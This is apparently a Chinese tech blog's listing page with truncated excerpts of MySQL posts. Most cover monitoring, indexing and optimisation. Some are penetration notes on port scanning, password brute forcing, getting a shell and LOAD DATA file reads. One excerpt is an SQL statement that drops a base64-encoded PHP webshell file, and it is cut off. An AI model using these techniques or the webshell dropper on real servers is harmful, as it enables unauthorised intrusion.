2024-12-29 厉飞雨 阅读(362) 评论(0) 赞(14)

一、MySQL信息收集 ----------- ### 1、端口信息收集 Mysql默认端口是3306端口，但也有自定义端口，针对默认端口扫描主要利用扫描软件进行探测，推荐使用： <br /> （1）nmap扫描nmap -p 3306 192.168.37.1-254 <br /> （2）iisputter，直接填写3306端口，IP地址填...

2024-12-29 厉飞雨 阅读(339) 评论(0) 赞(15)

Netdata是一个免费的开源、简单且可扩展的实时系统性能和健康监控应用程序，适用于Linux、FreeBSD和MacOS等类Unix操作系统。 Netdata收集各种指标并将其可视化，让用户可以观察系统上的操作。此外，它还支持各种插件，用于监控当前系统状态、正在运行的应用程序和服务（如MySQL数据库服务器）等。 在本文中，小编简单介绍如何在基于RHEL的发行版上使用Ne...

2024-12-29 厉飞雨 阅读(280) 评论(0) 赞(19)

 要查找数据库中以 `wp_statistics` 开头的表并删除它们，您可以使用以下 SQL 查询： ``...

2024-12-29 厉飞雨 阅读(372) 评论(0) 赞(12)

你好，我是**猿java**。 在 MySQL中，提供了多种索引类型，每种索引类型都有其特定的应用场景和优势。这篇文章，我们将对 MySQL 的索引类型进行详细的介绍，包括它们的结构、特点、适用场景以及优缺点。 1. 索引的基本概念 {#1-索引的基本概念} ======================= 在数据库中，索引类似于书籍的目录，可以帮助快速定位数据。没有索引时...

2024-12-29 厉飞雨 阅读(270) 评论(0) 赞(14)

select '<?php file_put_contents("abab.php",base64_decode("Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCS...

2024-12-29 厉飞雨 阅读(301) 评论(0) 赞(13)

前言 === 今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止，不会讲的太细。 一、sqlshell获取 ============ 要利用mysql首先得拿到一个可以执行sql的mysql才能利用，下面就说一下几种常见姿势，欢迎补充。 1、弱口令 这个比较简单，网上工具很多如美杜莎，九头蛇这些比较知名的，msf也有相应的模块。我自己之前也写过一个。要是运气...

2024-12-29 厉飞雨 阅读(303) 评论(0) 赞(14)

MySQL优化 ======= \*\*1. \*\* \*\*避免使用 select \* \*\* 你需要什么信息,就查询什么信息,查询的多了,查询的速度肯定就会慢 **2.** \*\*当你只需要查询出一条数据的时候,要使用 limit 1 \*\* 比如你要查询数据中是否有男生,只要查询一条含有男生的记录就行了,后面不需要再查了,使用Limit 1 可以在找到一条数...

2024-12-29 厉飞雨 阅读(283) 评论(0) 赞(12)

前言 === 随便记录一下笔记,方便查询.最近是想到什么就记什么. 渗透测试mysql ========= 关于如何攻击mysql请直接看这篇\>[Mysql数据库渗透及漏洞利用总结](https://xz.aliyun.com/t/1491)写的很全 拿shell ====== 1前提需要知道网站的真实**物理路径** 2查看是否允许导入导出 ...

2024-12-29 厉飞雨 阅读(271) 评论(0) 赞(12)

说明 === 涨姿势的文章日常分享 [通过MySQL LOAD DATA特性来达到任意文件读取](https://xz.aliyun.com/t/3973)

2024-12-24 厉飞雨 阅读(247) 评论(0) 赞(14)

<p>MyCLI 是一个易于使用的命令行客户端，可用于受欢迎的数据库管理系统 MySQL、MariaDB 和 Percona，支持自动补全和语法高亮。它是使用 <code>prompt_toolkit</code> 库写的，需要 Python 2.7、3.3、3.4、3.5 和 3.6 的支持。MyCLI 还支持通过 SSL 安全连接到 My...